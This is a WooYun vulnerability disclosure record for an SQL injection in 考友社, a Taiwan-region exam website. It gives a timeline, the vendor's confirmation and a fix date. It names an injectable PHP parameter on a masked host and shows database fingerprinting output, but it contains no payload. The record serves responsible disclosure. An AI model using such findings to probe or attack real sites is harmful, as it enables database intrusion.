
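Vulnerability summary

Bug ID: wooyun-2016-0170177

Vulnerability title: 考友社 SQL injection with ROOT privileges, 358 databases (Taiwan region)

Vendor: 考友社

Author: 龍 、

Submitted: 2016-01-17 10:33

Fixed: 2016-02-18 18:00

Publicly disclosed: 2016-02-18 18:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]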



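Vulnerability details

Disclosure status:

2016-01-17: Details reported to the vendor; awaiting vendor handling
2016-01-20: Vendor confirmed; details disclosed to the vendor only
2016-01-30: Details disclosed to core white hats and experts in related fields
2016-02-09: Details disclosed to regular white hats
2016-02-18: Vendor has fixed the vulnerability and proactively disclosed it; details disclosed to the public

Brief description:

As in the title.

Detailed description: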

Target: 		http://**.**.**.**/examRule.php?id=1
Host IP: **.**.**.**
Web Server: Apache/2.2.15 (CentOS)
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 5088 ms
Current User: lin23765@localhost
Sql Version: 5.1.73-log
Current DB: examiner
System User: lin23765@localhost
Host Name: **.**.**.**
Installation dir: /usr/
DB User & Pass:
Compile OS: redhat-linux-gnu
Data Bases:

Proof of vulnerability:

http://**.**.**.**/examRule.php?id=1




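Suggested fix:

Copyright notice: when reposting, please credit the source 龍 、@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2016-01-20 01:05

Vendor reply:

Thank you for the report.

Latest status:

2016-02-18: Fixed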